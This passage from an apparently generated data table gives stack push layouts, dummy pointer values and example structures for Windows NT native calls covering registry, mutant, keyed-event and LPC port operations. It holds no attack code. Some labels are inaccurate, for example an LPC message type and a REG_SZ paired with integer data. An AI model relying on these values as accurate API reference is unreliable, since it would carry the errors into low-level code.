"fieldComment": "No information yet" } ] } } }, "NtOpenKey": { "ntFunc": "NtOpenKey", "pushes": [ { "value": "0x00000000", "additionalComment": "None (no OBJECT_ATTRIBUTES, open root key)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00020019", "additionalComment": "KEY_READ | KEY_QUERY_VALUE | KEY_ENUMERATE_SUB_KEYS", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0000", "additionalComment": "Pointer to HANDLE KeyHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": {} }, "NtQueryKey": { "ntFunc": "NtQueryKey", "pushes": [ { "value": "0xbadd0010", "additionalComment": "Pointer to ULONG ResultLength (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000040" }, { "value": "0x00000100", "additionalComment": "Length of buffer (256 bytes)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0020", "additionalComment": "Pointer to buffer for KeyInformation (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000002", "additionalComment": "KeyInformationClass = KeyNodeInformation", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00004444", "additionalComment": "HANDLE KeyHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtQueryMultipleValueKey": { "ntFunc": "NtQueryMultipleValueKey", "pushes": [ { "value": "0xbadd0030", "additionalComment": "Pointer to ULONG RequiredLength (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000200" }, { "value": "0x00000200", "additionalComment": "BufferLength (512 bytes)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0040", "additionalComment": "Pointer to DataBuffer (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000002", "additionalComment": "NumberOfValues = 2", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0050", "additionalComment": "Pointer to KEY_MULTIPLE_VALUE_INFORMATION array (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00004444", "additionalComment": "HANDLE KeyHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtQueryValueKey": { "ntFunc": "NtQueryValueKey", "pushes": [ { "value": "0xbadd0060", "additionalComment": "Pointer to ULONG ResultLength (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000020" }, { "value": "0x00000040", "additionalComment": "Length (64 bytes)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0070", "additionalComment": "Pointer to KeyValueInformation buffer (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000001", "additionalComment": "KeyValueInformationClass = KeyValueFullInformation", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "None ValueName (query default value)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00004444", "additionalComment": "HANDLE KeyHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtReplaceKey": { "ntFunc": "NtReplaceKey", "pushes": [ { "value": "0x00000000", "additionalComment": "None BackupHiveFileName (no backup)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00004444", "additionalComment": "HANDLE KeyHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "None NewHiveFileName (no new hive file)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtRestoreKey": { "ntFunc": "NtRestoreKey", "pushes": [ { "value": "0x00000000", "additionalComment": "RestoreOption (default: 0, e.g. no special options)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x0000abcd", "additionalComment": "HANDLE FileHandle (dummy handle to registry hive file)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x0000beef", "additionalComment": "HANDLE KeyHandle (dummy handle to registry key)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtSaveKey": { "ntFunc": "NtSaveKey", "pushes": [ { "value": "0x0000abcd", "additionalComment": "HANDLE FileHandle (dummy handle to registry hive file)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x0000beef", "additionalComment": "HANDLE KeyHandle (dummy handle to registry key)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtSetInformationKey": { "ntFunc": "NtSetInformationKey", "pushes": [ { "value": "0x00000010", "additionalComment": "ULONG DataLength (example: 16 bytes of data)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0000", "additionalComment": "PVOID KeyInformationData (dummy pointer to data buffer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0xdeadbeef" }, { "value": "0x00000001", "additionalComment": "KEY_SET_INFORMATION_CLASS InformationClass (KeyWriteTimeInformation)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x0000beef", "additionalComment": "HANDLE KeyHandle (dummy handle to registry key)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtSetValueKey": { "ntFunc": "NtSetValueKey", "pushes": [ { "value": "0x00000004", "additionalComment": "ULONG DataSize (example: 4 bytes of data)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0010", "additionalComment": "PVOID Data (dummy pointer to data buffer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x12345678" }, { "value": "0x00000001", "additionalComment": "ULONG Type (REG_SZ)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "ULONG TitleIndex (usually 0, reserved)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0020", "additionalComment": "PUNICODE_STRING ValueName (dummy pointer to UNICODE_STRING)", "structurePointer": "UNICODE_STRING", "structureRef": "struct192", "structureValueExpectations": "Length, MaximumLength, Buffer pointer to value name string.", "pointedValue": None }, { "value": "0x0000beef", "additionalComment": "HANDLE KeyHandle (dummy handle to registry key)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct192": { "type": "UNICODE_STRING", "fields": [ { "fieldName": "Length", "fieldType": "USHORT", "fieldValue": "0x0010", "fieldComment": "Length in bytes of the string (8 UTF-16 chars)" }, { "fieldName": "MaximumLength", "fieldType": "USHORT", "fieldValue": "0x0020", "fieldComment": "Maximum buffer size in bytes" }, { "fieldName": "Buffer", "fieldType": "PWSTR", "fieldValue": "0xbadd0040", "fieldComment": "Dummy pointer to value name string buffer" } ] } } }, "NtUnloadKey": { "ntFunc": "NtUnloadKey", "pushes": [ { "value": "0xbadd0030", "additionalComment": "POBJECT_ATTRIBUTES DestinationKeyName (dummy pointer to OBJECT_ATTRIBUTES)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": "struct193", "structureValueExpectations": "Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.", "pointedValue": None } ], "structures": { "struct193": { "type": "OBJECT_ATTRIBUTES", "fields": [ { "fieldName": "Length", "fieldType": "ULONG", "fieldValue": "0x00000030", "fieldComment": "Size of OBJECT_ATTRIBUTES" }, { "fieldName": "RootDirectory", "fieldType": "HANDLE", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "ObjectName", "fieldType": "PUNICODE_STRING", "fieldValue": "0xbadd0050", "fieldComment": "Pointer to UNICODE_STRING (dummy pointer)" }, { "fieldName": "Attributes", "fieldType": "ULONG", "fieldValue": "0x00000040", "fieldComment": "OBJ_CASE_INSENSITIVE" }, { "fieldName": "SecurityDescriptor", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "SecurityQualityOfService", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" } ] } } }, "RtlFormatCurrentUserKeyPath": { "ntFunc": "RtlFormatCurrentUserKeyPath", "pushes": [ { "value": "0x00000000", "additionalComment": "PUNICODE_STRING RegistryPath (None, output parameter)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtCreateKeyedEvent": { "ntFunc": "NtCreateKeyedEvent", "pushes": [ { "value": "0x00000000", "additionalComment": "ULONG Reserved (must be zero)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "POBJECT_ATTRIBUTES ObjectAttributes (None, unnamed event)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x001F0003", "additionalComment": "ACCESS_MASK DesiredAccess (EVENT_ALL_ACCESS)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0000", "additionalComment": "PHANDLE KeyedEventHandle (dummy pointer, output parameter)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000444" } ], "structures": {} }, "NtReleaseKeyedEvent": { "ntFunc": "NtReleaseKeyedEvent", "pushes": [ { "value": "0x00000000", "additionalComment": "PLARGE_INTEGER Timeout (None, wait forever)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "BOOLEAN Alertable (FALSE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PVOID Key (None, no key specified)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE KeyedEventHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtWaitForKeyedEvent": { "ntFunc": "NtWaitForKeyedEvent", "pushes": [ { "value": "0x00000000", "additionalComment": "PLARGE_INTEGER Timeout (None, wait forever)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "BOOLEAN Alertable (FALSE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PVOID Key (None, no key specified)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE KeyedEventHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtCreateMutant": { "ntFunc": "NtCreateMutant", "pushes": [ { "value": "0x00000000", "additionalComment": "BOOLEAN InitialOwner (FALSE, caller does not own mutant initially)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "POBJECT_ATTRIBUTES ObjectAttributes (None, unnamed mutant)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x001F0001", "additionalComment": "ACCESS_MASK DesiredAccess (MUTANT_ALL_ACCESS)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0010", "additionalComment": "PHANDLE MutantHandle (dummy pointer, output parameter)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000445" } ], "structures": {} }, "NtOpenMutant": { "ntFunc": "NtOpenMutant", "pushes": [ { "value": "0x00000000", "additionalComment": "None (no OBJECT_ATTRIBUTES specified)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x001F0001", "additionalComment": "DesiredAccess (MUTANT_ALL_ACCESS)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0000", "additionalComment": "Pointer to HANDLE MutantHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": {} }, "NtQueryMutant": { "ntFunc": "NtQueryMutant", "pushes": [ { "value": "0xbadd0010", "additionalComment": "Pointer to ULONG ResultLength (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000010" }, { "value": "0x00000010", "additionalComment": "MutantInformationLength (size of MUTANT_BASIC_INFORMATION)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0020", "additionalComment": "Pointer to MUTANT_BASIC_INFORMATION (dummy pointer)", "structurePointer": "MUTANT_BASIC_INFORMATION", "structureRef": "struct194", "structureValueExpectations": "Holds state and count information about the mutant.", "pointedValue": None }, { "value": "0x00000000", "additionalComment": "MutantInformationClass (MutantBasicInformation)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE MutantHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct194": { "type": "MUTANT_BASIC_INFORMATION", "fields": [ { "fieldName": "CurrentCount", "fieldType": "LONG", "fieldValue": "0x00000001", "fieldComment": "Mutant is signaled (count = 1)" }, { "fieldName": "OwnedByCaller", "fieldType": "BOOLEAN", "fieldValue": "0x01", "fieldComment": "TRUE (owned by caller)" }, { "fieldName": "AbandonedState", "fieldType": "BOOLEAN", "fieldValue": "0x00", "fieldComment": "FALSE (not abandoned)" } ] } } }, "NtReleaseMutant": { "ntFunc": "NtReleaseMutant", "pushes": [ { "value": "0xbadd0030", "additionalComment": "Pointer to LONG PreviousCount (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000001" }, { "value": "0x00000444", "additionalComment": "HANDLE MutantHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtAcceptConnectPort": { "ntFunc": "NtAcceptConnectPort", "pushes": [ { "value": "0xbadd0040", "additionalComment": "Pointer to LPC_SECTION_MEMORY ClientSharedMemory (dummy pointer)", "structurePointer": "LPC_SECTION_MEMORY", "structureRef": "struct195", "structureValueExpectations": "Describes client shared memory section.", "pointedValue": None }, { "value": "0xbadd0050", "additionalComment": "Pointer to LPC_SECTION_OWNER_MEMORY ServerSharedMemory (dummy pointer)", "structurePointer": "LPC_SECTION_OWNER_MEMORY", "structureRef": "struct196", "structureValueExpectations": "Describes server shared memory section.", "pointedValue": None }, { "value": "0x00000001", "additionalComment": "AcceptConnection = TRUE", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0060", "additionalComment": "Pointer to LPC_MESSAGE ConnectionReply (dummy pointer)", "structurePointer": "LPC_MESSAGE", "structureRef": "struct197", "structureValueExpectations": "Reply message structure.", "pointedValue": None }, { "value": "0x00000445", "additionalComment": "HANDLE AlternativeReceivePortHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0070", "additionalComment": "Pointer to HANDLE ServerPortHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": { "struct195": { "type": "LPC_SECTION_MEMORY", "fields": [ { "fieldName": "Length", "fieldType": "ULONG", "fieldValue": "0x00000018", "fieldComment": "Size of LPC_SECTION_MEMORY" }, { "fieldName": "SectionHandle", "fieldType": "HANDLE", "fieldValue": "0x00000446", "fieldComment": "Dummy section handle" }, { "fieldName": "SectionBase", "fieldType": "PVOID", "fieldValue": "0x10000000", "fieldComment": "Base address of section" }, { "fieldName": "SectionSize", "fieldType": "ULONG", "fieldValue": "0x00001000", "fieldComment": "Section size (4KB)" } ] }, "struct196": { "type": "LPC_SECTION_OWNER_MEMORY", "fields": [ { "fieldName": "Length", "fieldType": "ULONG", "fieldValue": "0x00000020", "fieldComment": "Size of LPC_SECTION_OWNER_MEMORY" }, { "fieldName": "SectionHandle", "fieldType": "HANDLE", "fieldValue": "0x00000447", "fieldComment": "Dummy section handle" }, { "fieldName": "SectionBase", "fieldType": "PVOID", "fieldValue": "0x20000000", "fieldComment": "Base address of section" }, { "fieldName": "SectionSize", "fieldType": "ULONG", "fieldValue": "0x00002000", "fieldComment": "Section size (8KB)" }, { "fieldName": "ClientBase", "fieldType": "PVOID", "fieldValue": "0x21000000", "fieldComment": "Client base address" }, { "fieldName": "ClientSize", "fieldType": "ULONG", "fieldValue": "0x00001000", "fieldComment": "Client section size (4KB)" } ] }, "struct197": { "type": "LPC_MESSAGE", "fields": [ { "fieldName": "DataLength", "fieldType": "USHORT", "fieldValue": "0x0020", "fieldComment": "Message data length" }, { "fieldName": "TotalLength", "fieldType": "USHORT", "fieldValue": "0x0030", "fieldComment": "Total message length" }, { "fieldName": "Type", "fieldType": "USHORT", "fieldValue": "0x0001", "fieldComment": "Message type (LPC_REQUEST)" }, { "fieldName": "DataInfoOffset", "fieldType": "USHORT", "fieldValue": "0x0000", "fieldComment": "No data info" }, { "fieldName": "ClientId", "fieldType": "CLIENT_ID", "fieldValue": "0xbadd0080", "fieldComment": "Pointer to CLIENT_ID (dummy pointer)" }, { "fieldName": "MessageId", "fieldType": "ULONG", "fieldValue": "0x00000001", "fieldComment": "Message identifier" } ] } } }, "NtCompleteConnectPort": { "ntFunc": "NtCompleteConnectPort", "pushes": [ { "value": "0x00000445", "additionalComment": "HANDLE PortHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtConnectPort": { "ntFunc": "NtConnectPort", "pushes": [ { "value": "0xbadd0000", "additionalComment": "Pointer to ULONG ConnectionInfoLength (dummy pointer, typically input/output)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000020" }, { "value": "0xbadd0010", "additionalComment": "Pointer to connection info buffer (dummy pointer, optional, may be None)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0xbadd0020", "additionalComment": "Pointer to ULONG MaximumMessageLength (dummy pointer, output)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00001000" }, { "value": "0x00000000", "additionalComment": "PLPC_SECTION_MEMORY ServerSharedMemory (None, optional)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PLPC_SECTION_OWNER_MEMORY ClientSharedMemory (None, optional)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PSECURITY_QUALITY_OF_SERVICE SecurityQos (None, optional, default for most clients)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0030", "additionalComment": "Pointer to UNICODE_STRING ServerPortName (dummy pointer, required)", "structurePointer": "UNICODE_STRING", "structureRef": "struct198", "structureValueExpectations": "UNICODE_STRING describing the LPC port name.", "pointedValue": None }, { "value": "0xbadd0040", "additionalComment": "Pointer to HANDLE ClientPortHandle (dummy pointer, output)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": { "struct198": { "type": "UNICODE_STRING", "fields": [ { "fieldName": "Length", "fieldType": "USHORT", "fieldValue": "0x0020", "fieldComment": "Length in bytes of the string" }, { "fieldName": "MaximumLength", "fieldType": "USHORT", "fieldValue": "0x0040", "fieldComment": "Maximum length in bytes" }, { "fieldName": "Buffer", "fieldType": "PWSTR", "fieldValue": "0xbadd00b0", "fieldComment": "Pointer to LPC port name string (dummy pointer)" } ] } } }, "NtCreatePort": { "ntFunc": "NtCreatePort", "pushes": [ { "value": "0x00000000", "additionalComment": "Pointer to ULONG Reserved (None, unused in user mode)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00001000", "additionalComment": "ULONG MaxDataLength (4096 bytes typical for LPC)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000200", "additionalComment": "ULONG MaxConnectInfoLength (512 bytes typical)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0050", "additionalComment": "Pointer to OBJECT_ATTRIBUTES (dummy pointer, required)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": "struct199", "structureValueExpectations": "Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.", "pointedValue": None }, { "value": "0xbadd0060", "additionalComment": "Pointer to HANDLE PortHandle (dummy pointer, output)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": { "struct199": { "type": "OBJECT_ATTRIBUTES", "fields": [ { "fieldName": "Length", "fieldType": "ULONG", "fieldValue": "0x00000030", "fieldComment": "Size of OBJECT_ATTRIBUTES" }, { "fieldName": "RootDirectory", "fieldType": "HANDLE", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "ObjectName", "fieldType": "PUNICODE_STRING", "fieldValue": "0xbadd00c0", "fieldComment": "Pointer to UNICODE_STRING (dummy pointer)" }, { "fieldName": "Attributes", "fieldType": "ULONG", "fieldValue": "0x00000040", "fieldComment": "OBJ_CASE_INSENSITIVE" }, { "fieldName": "SecurityDescriptor", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "SecurityQualityOfService", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" } ] } } }, "NtImpersonateClientOfPort": { "ntFunc": "NtImpersonateClientOfPort", "pushes": [ { "value": "0xbadd0070", "additionalComment": "Pointer to LPC_MESSAGE Request (dummy pointer, required)", "structurePointer": "LPC_MESSAGE", "structureRef": "struct200", "structureValueExpectations": "LPC_MESSAGE structure containing client request.", "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE PortHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct200": { "type": "LPC_MESSAGE", "fields": [ { "fieldName": "DataLength", "fieldType": "USHORT", "fieldValue": "0x0010", "fieldComment": "Length of message data" }, { "fieldName": "TotalLength", "fieldType": "USHORT", "fieldValue": "0x0020", "fieldComment": "Total length including header" }, { "fieldName": "Type", "fieldType": "USHORT", "fieldValue": "0x0001", "fieldComment": "Message type (LPC_REQUEST)" }, { "fieldName": "DataInfoOffset", "fieldType": "USHORT", "fieldValue": "0x0018", "fieldComment": "Offset to data info" }, { "fieldName": "ClientId", "fieldType": "CLIENT_ID", "fieldValue": "0xbadd00d0", "fieldComment": "Pointer to CLIENT_ID (dummy pointer)" }, { "fieldName": "MessageId", "fieldType": "ULONG", "fieldValue": "0x00000001", "fieldComment": "Message identifier" } ] } } }, "NtListenPort": { "ntFunc": "NtListenPort", "pushes": [ { "value": "0xbadd0080", "additionalComment": "Pointer to LPC_MESSAGE ConnectionRequest (dummy pointer, output)", "structurePointer": "LPC_MESSAGE", "structureRef": "struct201", "structureValueExpectations": "LPC_MESSAGE structure to receive connection request.", "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE PortHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct201": { "type": "LPC_MESSAGE", "fields": [ { "fieldName": "DataLength", "fieldType": "USHORT", "fieldValue": "0x0010", "fieldComment": "Length of message data" }, { "fieldName": "TotalLength", "fieldType": "USHORT", "fieldValue": "0x0020", "fieldComment": "Total length including header" }, { "fieldName": "Type", "fieldType": "USHORT", "fieldValue": "0x0002", "fieldComment": "Message type (LPC_CONNECTION_REQUEST)" }, { "fieldName": "DataInfoOffset", "fieldType": "USHORT", "fieldValue": "0x0018", "fieldComment": "Offset to data info" }, { "fieldName": "ClientId", "fieldType": "CLIENT_ID", "fieldValue": "0xbadd00e0", "fieldComment": "Pointer to CLIENT_ID (dummy pointer)" }, { "fieldName": "MessageId", "fieldType": "ULONG", "fieldValue": "0x00000002", "fieldComment": "Message identifier" } ] } } }, "NtQueryInformationPort": { "ntFunc": "NtQueryInformationPort", "pushes": [ { "value": "0xbadd0090", "additionalComment": "Pointer to ULONG ResultLength (dummy pointer, output)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000010" }, { "value": "0x00000010", "additionalComment": "ULONG Length (16 bytes typical for PORT_BASIC_INFORMATION)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd00a0", "additionalComment": "Pointer to PORT_INFORMATION buffer (dummy pointer, output)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0x00000000", "additionalComment": "PORT_INFORMATION_CLASS PortInformationClass (PortBasicInformation)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE PortHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtReadRequestData": { "ntFunc": "NtReadRequestData", "pushes": [ { "value": "0xbadd0000", "additionalComment": "Pointer to ULONG ResultLength (dummy pointer, typically receives number of bytes read)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000020" }, { "value": "0x00000020", "additionalComment": "ULONG Length (number of bytes to read, e.g., 32 bytes)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0010", "additionalComment": "Pointer to buffer (dummy pointer, receives data)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0xdeadbeef" }, { "value": "0x00000001", "additionalComment": "ULONG DataIndex (index of data to read, e.g., 1)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0020", "additionalComment": "Pointer to LPC_MESSAGE Request (dummy pointer)", "structurePointer": "LPC_MESSAGE", "structureRef": "struct202", "structureValueExpectations": "Message header and data fields for the request.", "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE PortHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct202": { "type": "LPC_MESSAGE", "fields": [ { "fieldName": "DataLength", "fieldType": "USHORT", "fieldValue": "0x0020", "fieldComment": "Length of data in message (32 bytes)" }, { "fieldName": "TotalLength", "fieldType": "USHORT", "fieldValue": "0x0030", "fieldComment": "Total length including header" }, { "fieldName": "Type", "fieldType": "USHORT", "fieldValue": "0x0001", "fieldComment": "Message type (e.g., LPC_REQUEST)" }, { "fieldName": "DataInfoOffset", "fieldType": "USHORT", "fieldValue": "0x0010", "fieldComment": "Offset to data info" }, { "fieldName": "ClientId", "fieldType": "CLIENT_ID", "fieldValue": "0xbadd0090", "fieldComment": "Pointer to CLIENT_ID (dummy pointer)" }, { "fieldName": "MessageId", "fieldType": "ULONG", "fieldValue": "0x00000001", "fieldComment": "Message identifier" }, { "fieldName": "SectionSize", "fieldType": "ULONG", "fieldValue": "0x00000000", "fieldComment": "Unused in this example" } ] } } }, "NtReplyPort": { "ntFunc": "NtReplyPort", "pushes": [ { "value": "0xbadd0030", "additionalComment": "Pointer to LPC_MESSAGE Reply (dummy pointer)", "structurePointer": "LPC_MESSAGE", "structureRef": "struct203", "structureValueExpectations": "Message header and data fields for the reply.", "pointedValue": None }, { "value": "0x00000445", "additionalComment": "HANDLE PortHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct203": { "type": "LPC_MESSAGE", "fields": [ { "fieldName": "DataLength", "fieldType": "USHORT", "fieldValue": "0x0010", "fieldComment": "Length of data in message (16 bytes)" }, { "fieldName": "TotalLength", "fieldType": "USHORT", "fieldValue": "0x0020", "fieldComment": "Total length including header" }, { "fieldName": "Type", "fieldType": "USHORT", "fieldValue": "0x0002", "fieldComment": "Message type (e.g., LPC_REPLY)" }, { "fieldName": "DataInfoOffset", "fieldType": "USHORT", "fieldValue": "0x0008", "fieldComment": "Offset to data info" }, { "fieldName": "ClientId", "fieldType": "CLIENT_ID", "fieldValue": "0xbadd00a0", "fieldComment": "Pointer to CLIENT_ID (dummy pointer)" }, { "fieldName": "MessageId", "fieldType": "ULONG", "fieldValue": "0x00000002", "fieldComment": "Message identifier" }, { "fieldName": "SectionSize", "fieldType": "ULONG", "fieldValue": "0x00000000", "fieldComment": "Unused in this example" } ] } } }, "NtReplyWaitReceivePort": { "ntFunc": "NtReplyWaitReceivePort", "pushes": [ { "value": "0xbadd0040", "additionalComment": "Pointer to LPC_MESSAGE IncomingRequest (dummy pointer)", "structurePointer": "LPC_MESSAGE", "structureRef": "struct204", "structureValueExpectations": "Message header and data fields for the incoming request.", "pointedValue": None }, { "value": "0xbadd0050", "additionalComment": "Pointer to LPC_MESSAGE Reply (dummy pointer)", "structurePointer": "LPC_MESSAGE", "structureRef": "struct205", "structureValueExpectations": "Message header and data fields for the reply.", 